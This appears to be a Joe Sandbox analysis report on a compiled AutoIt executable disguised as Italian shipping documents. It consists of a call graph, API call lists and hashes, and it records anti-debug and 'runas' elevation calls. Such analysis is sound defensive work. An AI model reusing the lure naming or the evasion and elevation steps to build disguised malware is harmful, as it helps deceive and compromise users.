41dcab ReadFile 85655->85656 85662 41dd28 85655->85662 85658 41dcc9 GetLastError 85656->85658 85668 41dcd3 85656->85668 85657 41ded0 ReadFile 85659 41deef GetLastError 85657->85659 85666 41def9 85657->85666 85658->85655 85658->85668 85659->85663 85659->85666 85660 41ddec MultiByteToWideChar 85661 41de10 GetLastError 85660->85661 85660->85670 85661->85642 85664 41dda3 85662->85664 85665 41dd96 85662->85665 85662->85670 85671 41dd60 85662->85671 85663->85657 85663->85670 85664->85671 85672 41ddda 85664->85672 85667 417f77 wcstoxl 46 API calls 85665->85667 85666->85663 85669 420494 __lseeki64_nolock 48 API calls 85666->85669 85667->85670 85668->85655 85673 420494 __lseeki64_nolock 48 API calls 85668->85673 85669->85666 85670->85627 85670->85654 85671->85660 85674 420494 __lseeki64_nolock 48 API calls 85672->85674 85673->85668 85675 41dde9 85674->85675 85675->85660 85676->85559 85677->85582 85678->85561 85679->85577 85680->85582 85681->85569 85682->85577 85683->85579 85684->85578 85685->85582 85687 416b04 __malloc_crt 46 API calls 85686->85687 85688 420618 85687->85688 85688->85589 85689->85586 85690->85594 85694 4148b3 GetSystemTimeAsFileTime __aulldiv 85691->85694 85693 442c6b 85693->85200 85694->85693 85695->85207 85696->85213 85697->85213 85699 45272f __tzset_nolock _wcscpy 85698->85699 85700 414d04 61 API calls __fread_nolock 85699->85700 85701 44afef GetSystemTimeAsFileTime 85699->85701 85702 4528a4 85699->85702 85703 4150d1 81 API calls _fseek 85699->85703 85700->85699 85701->85699 85702->85122 85702->85123 85703->85699 85705 44b1bc 85704->85705 85706 44b1ca 85704->85706 85707 4149c2 116 API calls 85705->85707 85708 44b1e1 85706->85708 85709 44b1d8 85706->85709 85710 4149c2 116 API calls 85706->85710 85707->85706 85739 4321a4 85708->85739 85709->85149 85712 44b2db 85710->85712 85712->85708 85714 44b2e9 85712->85714 85713 44b224 85715 44b253 85713->85715 85716 44b228 85713->85716 85717 44b2f6 85714->85717 85719 414a46 __fcloseall 82 API calls 85714->85719 85743 
43213d 85715->85743 85718 44b235 85716->85718 85722 414a46 __fcloseall 82 API calls 85716->85722 85717->85149 85723 44b245 85718->85723 85726 414a46 __fcloseall 82 API calls 85718->85726 85719->85717 85721 44b25a 85724 44b260 85721->85724 85725 44b289 85721->85725 85722->85718 85723->85149 85728 414a46 __fcloseall 82 API calls 85724->85728 85730 44b26d 85724->85730 85753 44b0bf 87 API calls 85725->85753 85726->85723 85728->85730 85729 44b28f 85754 4320f8 46 API calls _free 85729->85754 85731 414a46 __fcloseall 82 API calls 85730->85731 85733 44b27d 85730->85733 85731->85733 85733->85149 85734 44b295 85735 44b2a2 85734->85735 85736 414a46 __fcloseall 82 API calls 85734->85736 85737 44b2b2 85735->85737 85738 414a46 __fcloseall 82 API calls 85735->85738 85736->85735 85737->85149 85738->85737 85740 4321cb 85739->85740 85742 4321b4 __tzset_nolock _memmove 85739->85742 85741 414d04 __fread_nolock 61 API calls 85740->85741 85741->85742 85742->85713 85744 4135bb _malloc 46 API calls 85743->85744 85745 432150 85744->85745 85746 4135bb _malloc 46 API calls 85745->85746 85747 432162 85746->85747 85748 4135bb _malloc 46 API calls 85747->85748 85749 432174 85748->85749 85752 432189 85749->85752 85755 4320f8 46 API calls _free 85749->85755 85751 432198 85751->85721 85752->85721 85753->85729 85754->85734 85755->85751 85756->85052 85757->85053 85758->85072 85759->85072 85760->85072 85761->85066 85762->85072 85763->85072 85764->85077 85765->85086 85766->85087 85767->85087 85817 410160 85768->85817 85770 41012f GetFullPathNameW 85771 410147 moneypunct 85770->85771 85771->84908 85773 4102cb SHGetDesktopFolder 85772->85773 85776 410333 _wcsncpy 85772->85776 85774 4102e0 _wcsncpy 85773->85774 85773->85776 85775 41031c SHGetPathFromIDListW 85774->85775 85774->85776 85775->85776 85776->84911 85778 4101bb 85777->85778 85782 425f4a 85777->85782 85779 410160 52 API calls 85778->85779 85780 4101c7 85779->85780 85821 410200 52 API calls 2 library calls 85780->85821 85781 4114ab __wcsicoll 58 
API calls 85781->85782 85782->85781 85784 425f6e 85782->85784 85784->84913 85785 4101d6 85822 410200 52 API calls 2 library calls 85785->85822 85787 4101e9 85787->84913 85789 40f760 126 API calls 85788->85789 85790 40f584 85789->85790 85791 429335 85790->85791 85792 40f58c 85790->85792 85795 4528bd 118 API calls 85791->85795 85793 40f598 85792->85793 85794 429358 85792->85794 85847 4033c0 113 API calls 7 library calls 85793->85847 85848 434034 86 API calls _wprintf 85794->85848 85796 42934b 85795->85796 85799 429373 85796->85799 85800 42934f 85796->85800 85804 4115d7 52 API calls 85799->85804 85803 431e58 82 API calls 85800->85803 85801 429369 85801->85799 85802 40f5b4 85802->84909 85803->85794 85816 4293c5 moneypunct 85804->85816 85805 42959c 85806 413748 _free 46 API calls 85805->85806 85807 4295a5 85806->85807 85808 431e58 82 API calls 85807->85808 85809 4295b1 85808->85809 85813 401b10 52 API calls 85813->85816 85816->85805 85816->85813 85823 444af8 85816->85823 85826 44b41c 85816->85826 85833 402780 85816->85833 85841 4022d0 85816->85841 85849 44c7dd 64 API calls 3 library calls 85816->85849 85818 410167 _wcslen 85817->85818 85819 4115d7 52 API calls 85818->85819 85820 41017e _wcscpy 85819->85820 85820->85770 85821->85785 85822->85787 85824 4115d7 52 API calls 85823->85824 85825 444b27 _memmove 85824->85825 85825->85816 85827 44b429 85826->85827 85828 4115d7 52 API calls 85827->85828 85829 44b440 85828->85829 85830 44b45e 85829->85830 85831 401b10 52 API calls 85829->85831 85830->85816 85832 44b453 85831->85832 85832->85816 85834 402827 85833->85834 85840 402790 moneypunct _memmove 85833->85840 85836 4115d7 52 API calls 85834->85836 85835 4115d7 52 API calls 85837 402797 85835->85837 85836->85840 85838 4115d7 52 API calls 85837->85838 85839 4027bd 85837->85839 85838->85839 85839->85816 85840->85835 85842 4022e0 85841->85842 85844 40239d 85841->85844 85843 4115d7 52 API calls 85842->85843 85842->85844 85846 402320 moneypunct 85842->85846 85843->85846 
85844->85816 85845 4115d7 52 API calls 85845->85846 85846->85844 85846->85845 85847->85802 85848->85801 85849->85816 85851 402417 85850->85851 85852 402539 moneypunct 85850->85852 85851->85852 85853 4115d7 52 API calls 85851->85853 85852->84917 85854 402443 85853->85854 85855 4115d7 52 API calls 85854->85855 85856 4024b4 85855->85856 85856->85852 85858 4022d0 52 API calls 85856->85858 85879 402880 95 API calls 2 library calls 85856->85879 85858->85856 85863 401566 85859->85863 85860 401794 85880 40e9a0 90 API calls 85860->85880 85862 40167a 85866 4017c0 85862->85866 85881 45e737 90 API calls 3 library calls 85862->85881 85863->85860 85863->85862 85865 4010a0 52 API calls 85863->85865 85865->85863 85866->84919 85868 40bc70 52 API calls 85867->85868 85877 40d451 85868->85877 85869 40d50f 85884 410600 52 API calls 85869->85884 85871 427c01 85885 45e737 90 API calls 3 library calls 85871->85885 85872 40e0a0 52 API calls 85872->85877 85874 40d519 85874->84922 85875 401b10 52 API calls 85875->85877 85877->85869 85877->85871 85877->85872 85877->85874 85877->85875 85882 40f310 53 API calls 85877->85882 85883 40d860 91 API calls 85877->85883 85879->85856 85880->85862 85881->85866 85882->85877 85883->85877 85884->85874 85885->85874 85886->84935 85887->84936 85889 4091c6 85888->85889 85890 42c5fe 85888->85890 85889->84999 85890->85889 85891 40bc70 52 API calls 85890->85891 85892 42c64e InterlockedIncrement 85891->85892 85893 42c665 85892->85893 85899 42c697 85892->85899 85895 42c672 InterlockedDecrement Sleep InterlockedIncrement 85893->85895 85893->85899 85894 42c737 InterlockedDecrement 85896 42c74a 85894->85896 85895->85893 85895->85899 85898 408f40 VariantClear 85896->85898 85897 42c731 85897->85894 85900 42c752 85898->85900 85899->85894 85899->85897 86172 408e80 85899->86172 86181 410c60 VariantClear moneypunct 85900->86181 85905 42c6db 85906 402160 52 API calls 85905->85906 85907 42c6e5 85906->85907 86177 45340c 85 API calls 85907->86177 85909 42c6f1 86178 40d200 52 API 
                        APIs
                        • _wcslen.LIBCMT ref: 004096C1
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • _memmove.LIBCMT ref: 0040970C
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                        • _memmove.LIBCMT ref: 00409D96
                        • _memmove.LIBCMT ref: 0040A6C4
                        • _memmove.LIBCMT ref: 004297E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                        • String ID:
                        • API String ID: 2383988440-0
                        • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                        • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104,?), ref: 00401F4C
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                        • String ID: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                        • API String ID: 2495805114-4167691841
                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                        • String ID: 0SH
                        • API String ID: 3363477735-851180471
                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                        APIs
                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: IsThemeActive$uxtheme.dll
                        • API String ID: 2574300362-3542929980
                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                        • TranslateMessage.USER32(?), ref: 00409556
                        • DispatchMessageW.USER32(?), ref: 00409561
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                        Similarity
                        • API ID: Message$Peek$DispatchSleepTranslate
                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                        • API String ID: 1762048999-758534266
                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104,?), ref: 00401F4C
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • __wcsicoll.LIBCMT ref: 00402007
                        • __wcsicoll.LIBCMT ref: 0040201D
                        • __wcsicoll.LIBCMT ref: 00402033
                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                        • __wcsicoll.LIBCMT ref: 00402049
                        • _wcscpy.LIBCMT ref: 0040207C
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104), ref: 00428B5B
                        Similarity
                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe$CMDLINE$CMDLINERAW
                        • API String ID: 3948761352-1779450810
                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                        Similarity
                        • API ID: __fread_nolock$_fseek_wcscpy
                        • String ID: D)E$D)E$FILE
                        • API String ID: 3888824918-361185794
                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                        • __wsplitpath.LIBCMT ref: 0040E41C
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • _wcsncat.LIBCMT ref: 0040E433
                        • __wmakepath.LIBCMT ref: 0040E44F
                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • _wcscpy.LIBCMT ref: 0040E487
                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                        • _wcscat.LIBCMT ref: 00427541
                        • _wcslen.LIBCMT ref: 00427551
                        • _wcslen.LIBCMT ref: 00427562
                        • _wcscat.LIBCMT ref: 0042757C
                        • _wcsncpy.LIBCMT ref: 004275BC
                        Similarity
                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                        • String ID: Include$\
                        • API String ID: 3173733714-3429789819
                        • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                        • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                        APIs
                        • _fseek.LIBCMT ref: 0045292B
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                        • __fread_nolock.LIBCMT ref: 00452961
                        • __fread_nolock.LIBCMT ref: 00452971
                        • __fread_nolock.LIBCMT ref: 0045298A
                        • __fread_nolock.LIBCMT ref: 004529A5
                        • _fseek.LIBCMT ref: 004529BF
                        • _malloc.LIBCMT ref: 004529CA
                        • _malloc.LIBCMT ref: 004529D6
                        • __fread_nolock.LIBCMT ref: 004529E7
                        • _free.LIBCMT ref: 00452A17
                        • _free.LIBCMT ref: 00452A20
                        Similarity
                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                        • String ID:
                        • API String ID: 1255752989-0
                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                        • ImageList_ReplaceIcon.COMCTL32(00AA31D0,000000FF,00000000), ref: 00410552
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                        • RegisterClassExW.USER32(?), ref: 0041045D
                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AA31D0,000000FF,00000000), ref: 00410552
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                        Similarity
                        • API ID: _malloc
                        • String ID: Default
                        • API String ID: 1579825452-753088835
                        • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                        • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                        Similarity
                        • API ID: __fread_nolock_fseek_memmove_strcat
                        • String ID: AU3!$EA06
                        • API String ID: 1268643489-2658333250
                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                        APIs
                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                        • CreatePopupMenu.USER32 ref: 00401204
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
